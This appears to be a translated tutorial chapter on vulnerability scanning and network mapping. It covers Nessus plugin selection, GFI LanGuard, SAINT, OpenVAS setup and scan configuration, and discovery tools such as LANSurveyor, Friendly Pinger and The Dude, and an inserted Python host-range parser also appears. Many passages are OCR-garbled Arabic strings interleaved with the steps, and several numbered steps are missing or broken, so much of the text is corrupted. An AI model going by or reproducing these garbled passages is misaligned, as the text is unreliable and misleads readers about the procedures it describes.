- Default Unix Accounts
- FTP
- Firewalls
- Gain a shell remotely
- General
- Netware
- Peer-To-Peer File Sharing
- Policy Compliance
- Port Scanners
- SCADA
- SMTP Problems
- SNMP
- Service Detection
- Settings

3- Using Nessus to scan for vulnerabilities on a Linux system: as explained above, select the following plugin families in the policy:

- Backdoors
- Brute Force Attacks
- CentOS Local Security Checks
- DNS
- Debian Local Security Checks
- Default Unix Accounts
- Denial of Service
- FTP
- Fedora Local Security Checks
- Firewalls
- FreeBSD Local Security Checks
- Gain a shell remotely
- General
- Gentoo Local Security Checks
- HP-UX Local Security Checks
- Mandriva Local Security Checks
- Misc
- Port Scanners
- Red Hat Local Security Checks
- SMTP Problems
- SNMP
- Scientific Linux Local Security Checks
- Slackware Local Security Checks
- Solaris Local Security Checks
- SuSE Local Security Checks
- Ubuntu Local Security Checks
- Web Servers

4- Using Nessus to scan for vulnerabilities on a Windows system: as explained above, select the following plugin families in the policy:

- Databases
- Denial of Service
- FTP
- SMTP Problems
- SNMP
- Settings
- Web Servers
- Windows
- Windows: Microsoft Bulletins
- Windows: User management





VULNERABILITY SCANNING TOOL: GFI LanGuard

Source: http://www.gfi.com

GFI LanGuard is a network security scanner and patch management tool that acts as a virtual security consultant, and is used in the following areas:

Patch management
Vulnerability assessment
Network and software auditing
Asset inventory
Mobile device management
Risk analysis
Compliance

WHY GFI LANGUARD?

1. Vulnerability assessment: it scans the computers and devices on the network for known vulnerabilities, including auditing the installed software and the security settings of each host.
2. Patch management: it detects the patches missing from the machines on your network and deploys them, including security updates for Microsoft and non-Microsoft applications.
3. Network auditing and monitoring.

PERFORM SECURITY SCANS

GFI LanGuard can scan in two ways, agent-based and agent-less; the scan shown here is agent-less.

1- Open GFI LanGuard; the following welcome screen appears:

[Screenshot: GFI LanGuard 2014 home screen with the tabs Dashboard, Scan, Remediate, Activity Monitor, Reports, Configuration, Utilities. "GFI LanGuard 2014 is ready to audit your network for vulnerabilities." Local Computer Vulnerability Level: "LanGuard has automatically enabled vulnerability auditing on the local computer. Current Vulnerability Level is: Not Available." Options: View Dashboard (investigate network vulnerability status and audit results); Remediate Security Issues (deploy missing patches, uninstall unauthorized software, turn on antivirus and more); Manage Agents (enable agents to automate network security audit and to distribute scanning load across client machines); Launch a Scan (manually set up and trigger an agentless network security audit). Latest News: 29-Mar-2014 updates to the vulnerability database (list of supported OVAL checks) and the patch management database (lists of supported Microsoft and non-Microsoft security updates).]
2- Click Launch a Scan; the following screen appears:

[Screenshot: GFI LanGuard Scan tab. Profile: Full Scan. Credentials: Currently logged on user. Scan target: localhost (192.168.138.1 [JANA-TEBA], Windows 8 x64 Gold), with the Network & Software Audit nodes Ports, Hardware, Software and System Information. Scan summary: "Scan was stopped by the user! This computer does not have a Vulnerability Level assigned." Possible reasons listed: the scan is not finished yet; detection of missing patches and vulnerabilities is disabled in the scanning profile used; the credentials used to scan this computer do not allow the scanner to retrieve all required information (an account with administrative privileges on the target computer is required); certain security settings on the remote computer block the access of the security scanner.]



3- Choose the Full Scan profile (which runs all types of checks).
4- Set the Scan Target to localhost, your own machine.
5- Under Credentials, choose Currently logged on user, so the scan runs with the account you are logged on with.
6- Click Scan; the scan starts and the following screen shows its progress:

[Screenshot: GFI LanGuard 2014 scan in progress. Estimated scan time remaining: 4 minutes; Scan progress: 1357 audit operations processed; Computers detected alive: 1 computer(s) responded during network discovery; Computers scanned: scan complete on 0 computer(s); Profile: Full Scan (Slow Networks). Scanner Activity Window: "STARTING SECURITY SCAN FOR MACHINE/RANGE: localhost. Profile: Full Scan (Slow Networks). Initializing scan engine... Validating targets... Building computers list ..." Threads: Network discovery, Scan thread 1 (192.168.138.1), Scan thread 2 (idle), Scan thread 3 (idle), Errors.]
[Screenshot: GFI LanGuard scan results for localhost (192.168.138.1 [JANA-TEBA], Windows 8 x64 Gold), profile Full Scan (Slow Networks), credentials Currently logged on user. Vulnerability Assessment: High Security Vulnerabilities (3), Medium Security Vulnerabilities (1), Low Security Vulnerabilities (5), Potential Vulnerabilities (5). Scanner Activity Window error at 3/29/2014 11:43:41 AM for JANA-TEBA, operation "Missing patches scan": "The patch management database is unavailable".]



When the scan finishes, the results are shown in the left pane under Vulnerability Assessment, grouped by severity (high, medium, low and potential vulnerabilities), and under Network & Software Audit (ports, hardware, software and system information); clicking an item shows its details. The Dashboard tab gives a summary of the scanned computers and the issues found:

[Screenshot: GFI LanGuard 2014 Dashboard for JANA-TEBA (192.168.138.1), group Entire Network / Localhost / Local Domain: WORKGROUP. Security Sensors: Vulnerability Level, Software Updates, Service Packs and Update Rollups, Vulnerabilities, Malware Protection Issues, Firewall Issues, Unauthorized Applications, Audit Status, Credentials Setup, Agent Health Issues. Top 5 Issues to Address: AutoRun is enabled; Windows Defender has detected spyware; Windows Defender has detected viruses; OVAL: 12566: Microsoft Windows Human Interface Device (HID) driver is prone to security bypass vulnerability; AutoShareServer. Computer Details: Operating System Windows 8 x64 (SP: Gold), Network Role Workstation, Language English (United States), OS Install Date 2/10/2014 6:02:47 PM. Last Scan: 3/29/2014 11:31:35 AM. Agent Status: Agent Not Installed. Results Statistics: Other Vulnerabilities: 9 (3 Critical/High); Potential Vulnerabilities: 5; Installed Applications: 112 (0 unauthorized); Open Ports: 16; Shares: 11; USB Devices: 6 (0 blacklisted).]
VULNERABILITY SCANNING TOOL: SAINT

Source: http://www.saintcorporation.com

SAINT is an integrated vulnerability scanning, penetration testing and compliance tool. Its main features are:

1- Scanning for vulnerabilities on systems and network devices such as servers, firewalls and routers; it supports IPv4 and IPv6 addresses as well as URL targets.
2- Web application vulnerability scanning.
3- Compliance with government and industry regulations such as PCI DSS, NERC, FISMA, SOX, GLBA, HIPAA and COPPA.



VULNERABILITY SCANNING TOOL: OPENVAS

OpenVAS (Open Vulnerability Assessment System) is a free vulnerability scanner that can be used on many platforms. It is a fork of the earlier open-source version of Nessus, and unlike Nessus its feed of vulnerability tests is completely free. OpenVAS comes preinstalled in Kali Linux as one of its built-in tools.

The following is a step-by-step guide to setting up OpenVAS and using it to scan a target:

1- OpenVAS is installed by default in Kali Linux, so it only needs to be configured before the first use. If it is not installed on your system, install it from your distribution's repositories first.

2- Open a terminal and change to the OpenVAS directory with the following command:

#cd /usr/share/openvas/

3- Run the following command:

#openvas-mkcert

This creates the OpenVAS SSL certificate. The command asks a few questions, and accepting the defaults is enough:
1- The lifetime of the server certificate in days.
2- The lifetime of the CA certificate in days: 1460.
3- The country, location and organization to put in the certificate.
Press Enter at each prompt to accept the default, and press Enter at the end to exit:



Creation of the OpenVAS SSL Certificate

Congratulations. Your server certificate was properly created.

The following files were created:

. Certification authority :

Certificate = /var/lib/openvas/CA/cacert.pem
Private key = /var/lib/openvas/private/CA/cakey.pem

. OpenVAS Server :

Certificate = /var/lib/openvas/CA/servercert.pem
Private key = /var/lib/openvas/private/CA/serverkey.pem

Press [ENTER] to exit



4- Run the following command:

#openvas-nvt-sync

This synchronises the local collection of NVTs (Network Vulnerability Tests) with the OpenVAS NVT Feed, so that the scanner has the latest vulnerability tests. Running it regularly keeps the tests current:

root@jana:/usr/share/openvas# openvas-nvt-sync
[i] This script synchronizes an NVT collection with the 'OpenVAS NVT Feed'.
[i] The 'OpenVAS NVT Feed' is provided by 'The OpenVAS Project'.
[i] Online information about this feed: 'http://www.openvas.org/openvas-nvt-feed.html'.
[i] NVT dir: /var/lib/openvas/plugins
[i] rsync is not recommended for the initial sync. Falling back on http.
[i] Will use wget
[i] Using GNU wget: /usr/bin/wget
[i] Configured NVT http feed: http://www.openvas.org/openvas-nvt-feed-current.tar.bz2
[i] Downloading to: /tmp/openvas-nvt-sync.jsQ0K20hia/openvas-feed-2014-03-29-5414.tar.bz2
--2014-03-29 16:16:45--  http://www.openvas.org/openvas-nvt-feed-current.tar.bz2
Resolving www.openvas.org (www.openvas.org)... 5.9.98.186
Connecting to www.openvas.org (www.openvas.org)|5.9.98.186|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 14661655 (14M) [application/x-bzip2]



# openvas-mkcert-client -n om -i
# openvasmd --rebuild

-C5 J| jilll CJlLiA\ S^ctS pUj S^lcjj cJ^AStJl S^tgJUO ^LuuL L_fl ^juj 

# openvassd
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.ciia j]| (j^asu (jjxlou j ^^jIjSJ! I^a 34491 cs-^ J^) ^-^-^V^ ^-i^ Jj^vi j OpenVAS u^^v ^ 



root@jana:/usr/share/openvas# openvassd
All plugins loaded

root@jana:/usr/share/openvas#



# openvasmd --rebuild
# openvasmd --backup



8- Create the OpenVAS administrator (openvasadmin) with the following command:

# openvasad -c 'add_user' -n openvasadmin -r admin



root@jana:/usr/share/openvas# openvasmd --rebuild
root@jana:/usr/share/openvas# openvasmd --backup
root@jana:/usr/share/openvas# openvasad -c 'add_user' -n openvasadmin -r admin
Enter password:
ad   main:MESSAGE:14689:2014-03-29 20h56.14 EDT: No rules file provided, the new user will have no restrictions.
ad   main:WARNING:14689:2014-03-29 20h56.14 EDT: Failed to create user openvasadmin!
root@jana:/usr/share/openvas#











9- To add a user, run the following command:

# openvas-adduser



2- At the authentication request ({authentication request}), press Enter (this keeps the default, password authentication).

4- Press Ctrl + D.



root@jana:/usr/share/openvas# openvas-adduser
Using /var/tmp as a temporary file holder.

Add a new openvassd user

Login : janateba
Authentication (pass/cert) [pass] :
Login password :
Login password (again) :

User rules

openvassd has a rules system which allows you to restrict the hosts that janateba
has the right to test. For instance, you may want him to be able
to scan his own host only.

Please see the openvas-adduser(8) man page for the rules syntax.

Enter the rules for this user, and hit ctrl-D once you are done:
(the user can have an empty rules set)



10- Now start the OpenVAS services with the following commands:

# openvasmd -p 9390 -a 127.0.0.1
# openvasad -a 127.0.0.1 -p 9393
# gsad --http-only --listen=127.0.0.1 -p 9392
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a tiL A dlldj j ^LuaU 4j jaJ) ILU) 9392 J^la 



root@jana:/usr/share/openvas# openvasmd -p 9390 -a 127.0.0.1
root@jana:/usr/share/openvas# openvasad -a 127.0.0.1 -p 9393
root@jana:/usr/share/openvas# gsad --http-only --listen=127.0.0.1 -p 9392



11- Open http://127.0.0.1:9392 in the browser to reach the OpenVAS web interface.



[Screenshot: Greenbone Security Assistant login page in Iceweasel at 127.0.0.1:9392/login/login.html, with Username and Password fields and a Login button]



CjIjUj %±c\k UUiji , (repository)uj3^^ OpenVAS -^-^.jj j J^j^i siaU ^ Uta j£] <(3f^ 

OpenVAS s-^j^ ^-s-^j ^j^-' ^ l^j^V^ ~ .^i JSi l-jL ^ UjUijl ^2 .UjJ ^cLaa>JI ^LxAj^JI cIujjjj s^l ^ *\\\ 

_(J ^^^31 (Jjl^jaaJ 4_jujLuj £A du^a j 

.CjUUJI dJ&l£ f Luul dJl^l ^J) ^H^j <_flj*uud t OpenVAS I J^VI o^u liliL ^ jSj Sj-a J£ ^ ;AJa j^ia 

: OpenVAS cr^j £*Ujj ? Uti) • 

-(^' 'OpenVAS ^ s-^ 

.(Saja*. c > >\ Jalaj c fll un^l UJ£ ^jj C— gAa2»> Lajh J laj > >i) NVT Feed 3-^1 ~1 

.OpenVAS o-^ -2 

.dAiUJ! %±zXk *Lud SjIcI -3 

,t*L <j^aUJI ialiJI (jjj^i -5 

OpenVAS.sh ^-al*31 li* hq^j ^ .OpenVAS ^ £^£5 q\ IgiLi ^ k^j Lua «<^a jll jjjSII ilS^V 

:/root 



#!/bin/bash
# Sync the NVT feed, start the scanner, rebuild and back up the manager
# database, then bind manager, administrator and web UI to loopback only.

openvas-nvt-sync

openvassd

openvasmd --rebuild

openvasmd --backup

openvasmd -p 9390 -a 127.0.0.1

openvasad -a 127.0.0.1 -p 9393

gsad --http-only --listen=127.0.0.1 -p 9392



• Using the OpenVAS Desktop
4_£^Jj injoi^ (Jjfiaj jA c-u£ oil ^Jaui OpenVAS .<-^a!I ^laui OpenVAS <— i\ jlaaJI ^^ij iiiii ^ tUjUik! 

■l3J- ^-Ail _A-L<i jjuj^)3I ^Vim^l 
Applications > Kali Linux > Vulnerability Assessment > Vulnerability Scanners > OpenVAS > openvas-setup

i^Vl^ ^Aj^alall J^lk (JjjJ j '^lia jjujjII A-a. jit J!)Lk ^ Openvas J^ *^ j 
Applications > Kali Linux > Vulnerability Assessment > Vulnerability Scanners > OpenVAS > openvas-gsd



[Screenshot: OpenVAS Desktop (GSD) main window with the File, Task, View, Settings, Extras and Help menus, a Status/Reports pane and tabs for Tasks, Targets, Schedules, Scan Configs, Escalators, Credentials, Agents, Notes, Overrides, Slaves, Report Formats, Port Lists and Performance]



1- Enter your server address (Enter your server address): 127.0.0.1

2- Enter the Username

3- Enter the Password

4- Click Log in



OPENVAS - FINDING LOCAL VULNERABILITIES

<UV ».vw *W i *a» > Jalij ^jc. l— l^al] OpenVAS ~ laJLudj l_a jjoj j^JI 11a ^ . ^ t^i* '^liluj^U ^.uij c _^j3I CjUj jLlxJI ^ jil 

-^Ld ^jfl (jJ^la (jc OpenVAS 4_il^<Jl L_a*jJa]| Jataj .Aaj] 4_iLaC l^fj U jCO 

1- Open http://127.0.0.1:9392 in the browser's URL bar and log in (Log in).
2- From the Configuration menu choose Scan Configs.



[Screenshot: Greenbone Security Assistant in Iceweasel, logged in as user janateba (Sun Mar 30 02:12:50 2014 UTC), with the menus Scan Management, Asset Management, Configuration, Extras, Administration and Help; the Configuration menu lists Scan Configs, Credentials, Escalators, Schedules, Port Lists, Report Formats and Slaves. Copyright 2009-2012 by Greenbone Networks GmbH, www.greenbone.net]
3- After clicking Scan Configs, a page opens on which a new scan config is created. Enter Local Vulnerabilities in the Name field, choose Empty, static and fast as the Base, and then click Create Scan config.



[Screenshot: New Scan Config dialog: Name = Local Vulnerabilities; Comment (optional); Base = "Empty, static and fast" selected, "Full and fast" as the alternative; Create Scan Config button]



4- Now edit the scan config Local Vulnerabilities that was just created:





Name                         Families   NVTs    Description
Full and fast                51         34475   Most NVTs; optimized by using previously collected information.
Full and fast ultimate       51         34475   Most NVTs including those that can stop services/hosts; optimized by using previously collected information.
Full and very deep           51         34475   Most NVTs; don't trust previously collected information; slow.
Full and very deep ultimate  51         34475   Most NVTs including those that can stop services/hosts; don't trust previously collected information; slow.
Local Vulnerabilities        0          0
empty                        0          0       Empty and static configuration template.

(Families and NVTs are the Total counts; the Trend and Actions columns of the page are icons and are omitted.)

5- The page that appears lists the NVT families (plug-ins), as in Nessus.

6- Press Ctrl + F and search for Local.
7- For every family whose name contains Local, tick Select all NVT's.



+ Compliance
+ Credentials
+ Default Accounts
+ Denial of Service
+ FTP
...
+ Ubuntu Local Security Checks

8- Click Save Config.
Edit Network Vulnerability Test Families

Family                          NVTs selected   (Trend / Select all NVTs / Action columns omitted)
AIX Local Security Checks       0 of 1
Brute force attacks             0 of 8
Buffer overflow                 0 of 491
CISCO                           0 of 14
CentOS Local Security Checks    0 of 2082
Compliance                      0 of 4
Databases                       0 of 115
Debian Local Security Checks    0 of 2899
Default Accounts                0 of 68
Denial of Service               0 of 873
FTP                             0 of 168
Fedora Local Security Checks    0 of 7389


9- Now go to Configuration > Target.



[Screenshot: GSA menu bar: Scan Management, Asset Management, Configuration, Extras, Administration, Help]

10- Create a new target by filling in the following:
- Enter a name for the target in the Name field.

- Enter the hosts to scan in the Hosts field, in one of the following forms:

- a single host: 192.168.0.10
- several hosts separated by commas: 192.168.0.104,192.168.0.115

- a range of hosts: 192.168.0.1-20

11- Click Create Target.
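A small parser for the three Hosts forms listed above, added here as an illustration of what the target field expands to (this is not OpenVAS code); the CIDR form and a full-address range end are assumptions beyond what the page shows, and the scope check is the kind of guard a defender would put in front of a scan.

```python
import ipaddress

# Host-field parser for the forms used in this walkthrough (added example):
#   a single address        192.168.0.10
#   a comma-separated list  192.168.0.104,192.168.0.115
#   a range                 192.168.0.1-20   (last octet only, as on the page)
# Also accepted, as assumptions beyond the page: CIDR (10.0.0.0/30) and a
# range whose end is a full address (192.168.0.1-192.168.0.20).


def expand_hosts(spec):
    """Return the list of IPv4 addresses (as strings) that spec describes."""
    hosts = []
    for item in spec.replace(" ", "").split(","):
        if not item:
            continue
        if "/" in item:                       # assumption: CIDR notation
            net = ipaddress.ip_network(item, strict=False)
            hosts.extend(str(a) for a in net.hosts())
        elif "-" in item:
            first, last = item.split("-", 1)
            start = ipaddress.ip_address(first)
            if "." in last:                    # assumption: full end address
                end = ipaddress.ip_address(last)
            else:                              # short form: only the last octet
                end = ipaddress.ip_address(first.rsplit(".", 1)[0] + "." + last)
            if int(end) < int(start):
                raise ValueError("range end before start: " + item)
            hosts.extend(str(ipaddress.ip_address(n))
                         for n in range(int(start), int(end) + 1))
        else:
            hosts.append(str(ipaddress.ip_address(item)))
    return hosts


def out_of_scope(spec, allowed_cidrs):
    """Addresses in spec that fall outside every allowed network.

    A scan task should refuse to start when this list is non-empty: a typo
    in the Hosts field otherwise turns a local assessment into a scan of a
    network that is not yours."""
    allowed = [ipaddress.ip_network(c) for c in allowed_cidrs]
    return [h for h in expand_hosts(spec)
            if not any(ipaddress.ip_address(h) in n for n in allowed)]


if __name__ == "__main__":
    for spec in ("192.168.0.10", "192.168.0.104,192.168.0.115", "192.168.0.1-20"):
        print(spec, "->", len(expand_hosts(spec)), "host(s)")
    # A range that spills past the engagement's /24 is flagged before scanning.
    print(out_of_scope("192.168.0.250-255,192.168.1.1", ["192.168.0.0/24"]))
```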



[Screenshot: New Target dialog: Name = JANA; Hosts = Manual (localhost) or From file (Browse...); Comment (optional); Port List = All IANA assigned TCP and UDP 2012-02-10; SSH Credential (optional) on port 22; SMB Credential (optional); Create Target button]



12- Go to Scan Management > New Task and fill in the following:

- enter a name for the task;
- choose the scan config Local Vulnerabilities created earlier;

- click Create task.



[Screenshot: New Task dialog: Name = Noreen; Comment (optional); Scan Config = Local Vulnerabilities; Scan Targets = JANA; Escalator, Schedule, Slave and Observers (optional); Scan Intensity: maximum concurrently executed NVTs per host and maximum concurrently scanned hosts (20); Create Task button]



13- Go to Scan Management > Tasks and run the task you created by clicking its run icon.


[Screenshot: Tasks list (auto-refresh and "Apply overrides" controls) showing the task Noreen with its Status, Reports (Total / First / Last), Threat, Trend and Actions columns]


OpenVAS - finding network vulnerabilities

+ Brute force attacks
+ Buffer overflow
+ CISCO
+ Compliance
+ Credentials
+ Databases
+ Default Accounts
+ Denial of Service
+ FTP
+ Finger abuses
+ Firewalls
+ Gain a shell remotely
+ General
+ Malware
+ Netware
+ NMAP NSE
+ Peer-To-Peer File Sharing
+ Port Scanners
+ Privilege Escalation
+ Product Detection
+ RPC
+ Remote File Access
+ SMTP Problems
+ SNMP
+ Service detection
+ Settings
+ Wireless services

OpenVAS - finding Linux-specific vulnerabilities

+ Brute force attacks
+ Buffer overflow
+ Compliance
+ Credentials
+ Databases
+ Default Accounts
+ Denial of Service
+ FTP
+ Finger abuses
+ Gain a shell remotely
+ General
+ Malware
+ Netware
+ NMAP NSE
+ Port Scanners
+ Privilege Escalation
+ Product Detection
+ RPC
+ Remote File Access
+ SMTP Problems
+ SNMP
+ Service detection
+ Settings
+ Wireless services
+ Web Servers

OpenVAS - finding Windows-specific vulnerabilities

+ Brute force attacks
+ Buffer overflow

https://www.facebook.com/tibea2004



+ Compliance
+ Credentials
+ Databases
+ Default Accounts
+ Denial of Service
+ FTP
+ Gain a shell remotely
+ General
+ Malware
+ NMAP NSE
+ Port Scanners
+ Privilege Escalation
+ Product Detection
+ RPC
+ Remote File Access
+ SMTP Problems
+ SNMP
+ Service detection
+ Web Servers
+ Windows
+ Windows: Microsoft Bulletins



NETWORK VULNERABILITY SCANNERS 



a<^ ^jl^ J a& ^umW AS^ill t fljujal l Jalij ^j^j ^ cil^Luj ^1 Cj! j^Vl ^ Network Vulnerability Scanners 

qC* <Jj3 ^ .^tl] tCjllnlajll j jjLalt ialL<J! t^LJl ^l^cj i jLaV! cl^J^ tJjajuSjll ^»Uaj tAj^Luj^U! j! Aj^Loili fiK^^l 

^jll djj^aaII ^Liuujjll l$*5t j c^j^-Vl <— il j^Vl Lpasu Uua ^Openvasj Nessus ^ j ^i^J ^vim^l dj| j^Vl 

Retina CS available at http://go.eeye.com or http://go.beyondtrust.com/community

Core Impact Professional available at http://www.coresecurity.com

MBSA available at http://www.microsoft.com

Shadow Security Scanner available at http://www.safety-lab.com

Nsauditor Network Security Auditor available at http://www.nsauditor.com

OpenVAS available at http://www.openvas.org

Security Manager Plus available at http://www.manageengine.com

Nexpose available at http://www.rapid7.com

QualysGuard available at http://www.qualys.com

Security Auditor's Research Assistant (SARA) available at http://www-arc.com
3.6 DRAW NETWORK DIAGRAMS



(router) j^l * j&^j 4J-*aJI j* ^ ^-<u.hj *ul .4£jJd3l ^ t^^JI < ^uJl jLaa>JI ^ui ^^ic til^cLaij a£jJo13 



CjI^JI a£jJJ3 S jVijVi^^ l cjUj^JI (mapping tools) ^ j j' (network discovery tool) Jl^VI 

,a£jjoJ cJ^-*^ jj> ^>Jj .Ai^JjaixJl 




FIGURE 3.52: Network Diagram (an intranet with several users, a file server, an app server, a PHP server, an HTTP server, a proxy server and a DB server)



NETWORK DISCOVERY TOOL: LANSurveyor 



http://www.solarwinds.com

ILixld diVU^ajVI o^j^ cs-^* U-^ n>i^l ^jc a£jJo3I ^ ^Uijjj c al un^U Ujliii till ^joij LANSurveyor 

^jijjjjjoj '(node) 6 ^- ls^I u^j^ 'u^j^ c^) u^j^ J^-^^ o^j^ OSI 3 <ya31 j 2 <afL3l Ji<i 

Ij^j CjI j^ull L^jI .Microsoft Office Visio ^ ^j^j ^ ^ a<^A\ UU^a jja^ .(router)^ j^^ 

1 ^La ujJ ^alJ ^nJalli ^jC 6^)A3La3I ^^^C jnir t ^aJ CllifLill 4_iLislI jn>^^ Wizard ^ ftl^VI 



si -1 

2- Click Continue with Evaluation to use the evaluation version.

3- Click Start Scan; in the Create A Network Map dialog enter the range to scan in the Begin Address and End Address fields.

4- Click Start Network Discovery.
[Screenshot: Create A New Network Map dialog. Network Parameters: Begin Address 192.168.16.1, End Address 192.168.16.254, Enter Next Address. Routers, Switches and Other SNMP Device Discovery (following router hops requires SNMP router access): SNMPv1 devices with community strings public, private; SNMPv2c devices with community strings public, private; SNMPv3 devices; Hops. Other IP Service Discovery: LANsurveyor Responders (with responder password), ICMP (Ping), NetBIOS Clients, SIP Clients, Active Directory DCs (Authentication...). Mapping Speed slider. Configuration Management: Save Discovery Configuration, Load Discovery Configuration... Start Network Discovery button]


[Screenshot: SolarWinds LANsurveyor, Mapping Progress window: "Searching for IP nodes", Hop 0: 192.168.16.156 - 192.168.16.254, with counters for SNMP Sends, SNMP Receipts, ICMP Ping Sends, ICMP Receipts, Subnets Mapped, Nodes Mapped, Routers Mapped, Switches Mapped and Last Node Contacted]

6- After the discovery finishes, the network map appears as shown below.






[Screenshot: SolarWinds LANsurveyor, Map 1. Left pane: Network Segments (2), IP Addresses (4), Domain Names (4), Node Names (4), IP Routers (1), LANsurveyor Responder Nodes, SNMP Nodes (1), SNMP Switches/Hubs, SIP (VoIP) Nodes, Layer 2 Nodes, Active Directory DCs, Groups. The map shows the nodes JANA, SAMA (192.168.16.73) and TEBA (192.168.16.71) on the 192.168.16.0 segment and an SNMP node at 192.168.16.1]

NETWORK DISCOVERY TOOL: OPMANAGER 

Source: http://www.manageengine.com



jj! ja jic tillij *bVlj *Lk^Vl ^ajJ Sjbi fjft\j a£^JI *b1 SjbV sbi ^LuiVl ^ OpManager 

^IjaJljVolP call paths ^ajU^JI jlj^ ^switches 'WAN caiL-aj 'router s Ji* <^t^ IT cjUjkJI L^j]j£j 




: OpManager ^>j^> <> o**-} ^ 
IPu 1 s J b ! - 

A<*u*\\ pbVl JJjUS ^1 

Exchange ^SL ial 
Active directory 
Hyper-V 
.SQL - 
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NETWORK DISCOVERY TOOL: Network View 




JL^jI s jblj c_fll£&V sbi ^ Network View 

^l^kloib TCP/IP ^ Sj^tj lJL£SI -1 
WMIj NetBIOSj Portsj SNMPj DNS 
NIC j MAC u'j^ jj^J! -2 

>Lul! o-n^j cWMI browser j SNMP MIB browser 4> ^UJ! *£*i!t o^bj ^S^l -5 

NETWORK DISCOVERY TOOL: The Dude 

om : j^-a^ll 

Aj^jj (ciL 4_j^LkJI <JL^jV1 cjI^jjuJ <iaj^k ^jja jj ^ajoajj ^aw a ajc cjI^jjuj <J^.ta s j^-^Vl (j^^^j UjUIj The Dude 

: C5 L Lui CjIJj^I 4> Jjfi <ilUA 

kikkjl) j .nil 
S j^a^U 4jjL^j3I 3_a^Isl!I jl ^ jj c^l <■ Q *n^J 

4 >n>^i^ tf> s 7> i AiLjaj j tiL <j^aLaJl Jajl j^Jl ,ajuijl till ^laliij 

<4U ^ ^1 sj^Vl a^jTCP j 'DNS TCMP < SNMP^Aj - 





MAPPING TOOL: FRIENDLY PINGER 



Source: http://www.kilievich.com
, j> rt^W j t^j^ajll j tA^jJall Sj^V ^'^^ >>1 VI 5J^juj ^nJaj Friendly Pinger 
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^1 j^Jl c fll un^V a£jJo3I iajl^kJI ^jujj <_£j^j La s^tc .djl^jJoll ^Lj^l -^j^ <Loj!j^ (Network mapping) -lajl^pJI 

• jjjiaul 4_JU3I dUlj^VI iiii Friendly Pinger 
.SjajjJI Sj^i Monitoring -1 
.4£jJd3l C5 ic ^L/jajjjoj (jlc. jl Jj«j^j 4_iLac cj^. lil tiU^lcj Notifies -2 
.^f^l j^^^ * j^' 6 jl jl ^ <y*^ Audits hardware and software -3 

.6^.1 j 6j-<i ^-ia^J J-ftc Ping -4 



Friendly Pinger 

^iUxj ^-aUJI Wizard ^LjL - 1 



.NO ^ -iaijJaj jjc <j <j^aUJt ^jLj jll o^UIoj tiUUaj Friendly Pinger u' 



[Screenshot: Friendly Pinger main window with Demo.map open; menus File, Edit, View, Ping, Notification, Scan, FWatcher, Inventory, Help; the demo map shows an Internet node, a shortcut server and workstations]

Wizard ^lill <> File -3 




[Screenshot: Friendly Pinger File menu, with entries including Save As..., Save As Image... (Ctrl+E), Print..., Lock..., Create Setup..., Options... and Exit; the Wizard entry is the one used in this step]

.Next 
[Wizard dialog, Local IP address: "The initial map will be created by query from DNS-server the information about following IP-addresses: 10.0.0.1-20. You can specify an exacter range of scanning to speed up the operation. For example: 10.129-135.1-5.1-10." Timeout: 1000 ("Timeout allows to increase searching, but you can miss some addresses."). Buttons: Help, Next, Cancel]



5- The wizard scans the IP addresses in the network and lists the devices it found, as shown below.

6- Click Next.



[Wizard results: IP address / Name: 10.0.0.2 WIN-MSSELCK4K41; 10.0.0.3 Windows8; 10.0.0.5 WIN-LXQN3WR3R9M; 10.0.0.7 WIN-D39MR5HL9E4. "The inquiry is completed. 4 devices found. Remove tick from devices, which you don't want to add on the map." Buttons: Help, Back, Next, Cancel]



7- Enter the remaining settings in the Wizard, then click Next.



[Wizard dialog: Devices type = Workstation; Address: Use IP address / Use DNS-name (selected); Remove DNS suffix; Add devices to the new map / Add devices to the current map (selected). Buttons: Help, Back, Next, Cancel]



8- After clicking Next, the map of the devices FPinger found appears, as shown below.

i^Vl^ 4-1* <Uiudi<JI ^-Ajlill ^ scan ^» > ^ ^ l£ ^ j^VI -^j^ ^ ^ 




.Scan wizard ^ o-^^l J^LiS o^j^ ^ ^ 
.AjjlxJI ^ajUII ^ *^ j^. j-<JI Inventory -^i-jjalb tilli ^il 6jHk-<J! jii jn^l s <j^aLk]| Jj - ^ j Cjbl^cVI ^jji 
5- 3?JI ^ a^j .dilc ^ ^1 ^MiVn L$ jlxJI ^ j <LiLi3l j^-laj Inventory ^» > 

:c5^VIS (Operating system) J^ftll (Computer name) jW H ^ cSJ 1 ^ General 



10 
11 

12 
[Screenshot: Friendly Pinger Inventory window for WIN-D39MR5HL9E4 (menus File, Edit, View, Report, Options, Help), General tab: Host = WIN-D39MR5HL9E4, User name = Administrator, Windows = Windows Server 2012 Release Candidate Datacenter, Service pack, Collection time = 8/22/2012 11:22:34 AM; further tabs Misc, Hardware, Software, History]

jjjjux^l jl^a. C5 1& jajlxJI jjj^II CjULJI ^Ikjj MAC uL^j IP ub^ ^ lP 3 ^ Misc a^j*^! -13 

.Jjj^a£i3lj ajjLJI jj jji^ll ^ lP 3 ^*^ Hardware ^ j-*?^-14 
_ jUa^ll jj jn^l jt$j> ^^Jc ajjIa!) djlqjiUill ^.a^ ^jiajxj Software 



- - 1 5 



Scanning Devices in a Network Using The Dude 



http://www.mikrotik.com/thedude.php 
<iL (j^aLkl! a£jjuo13 <iLjj^. ^jojjj ^ajlj ? (subnet) cS^j <J^ J ^jl j*ty^)$^VI °; <Ljiaj ^jIj (j^flaj Dude 

.c*L a L^aLaJl Sjtal ^ t^lSjjJa (jjmVi ^^ic J-<i3u j (jjj^ j& Dude 
I^Vl^ 4_loujj3I 4_uiLuJI j^Jalia <ic djjjlxJI cJ^-^> ^ b* ujj 4j ^j^aLiJI Wizard -^-^ cJ^-^> o." ( ^ - 1 



[Screenshot: The Dude 4.0beta3, admin@localhost: toolbar with Preferences, Local Server, Help, Settings; Contents pane listing Address Lists, Admins, Agents, Charts, Devices, Files, Functions, History Actions, Links, Logs (Action, Debug, Event, Syslog), Mib Nodes, Network Maps; status bar: Client rx 358 bps / tx 197 bps, Server rx 216 bps / tx 392 bps]

Device Discovery ub^ ^ csj^ jj^ cs^j 2 ^ j Aj^jM Discover ^ > -2 
[Device Discovery dialog, General tab (other tabs: Services, Device Types, Advanced): Scan Networks = 192.168.16.0/24 ("Enter subnet number you want to scan for devices"); Agent = default; Add Networks To Auto Scan; Black List = none; Device Name Preference = DNS, SNMP, NETBIOS, IP; Discovery Mode = fast (scan by ping) or reliable (scan each service); Recursive Hops = 0 (slider 0 to 50); Layout Map After Discovery Complete. Buttons: Discover, Cancel]

Default l$I ja US Agent Jj^VI J*^ o 
